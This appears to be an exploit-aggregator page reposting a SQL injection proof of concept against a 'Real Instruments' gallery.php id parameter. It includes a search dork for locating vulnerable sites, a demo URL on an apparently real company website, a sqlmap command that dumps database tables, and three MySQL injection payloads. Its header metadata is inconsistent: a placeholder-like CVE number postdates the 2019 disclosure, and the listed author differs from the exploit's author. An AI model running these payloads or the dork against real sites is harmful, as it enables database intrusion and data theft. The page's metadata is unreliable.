Advertisement






Real Instruments SQL Injection

CVE Category Price Severity
CVE-2020-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
John Doe High Remote 2019-05-19
CPE
cpe:cpe:/a:real-instruments:real-instruments
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.65234 0.98654

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050200

Below is a copy:

Real Instruments SQL Injection
# Exploit Title:Real Instruments  SQL Injection
# Date:17.05.2019
# Dork :intitle:"Real Instruments"   gallery.php?id=
# Exploit Author:Cerkuday 
# Tested on:Windows &Kali Linux



#Demo:

http://www.realinstruments.ca/gallery.php?id=1


# Poc:

sqlmap -u "http://www.realinstruments.ca/gallery.php?id=1"  --text-only  --random-agent -D realinstruments --tables
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1497=1497

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-3734 OR 1 GROUP BY CONCAT(0x71767a6b71,(SELECT (CASE WHEN (4299=4299) THEN 1 ELSE 0 END)),0x7178767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 3359=BENCHMARK(5000000,MD5(0x6a4f4b61))
---

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum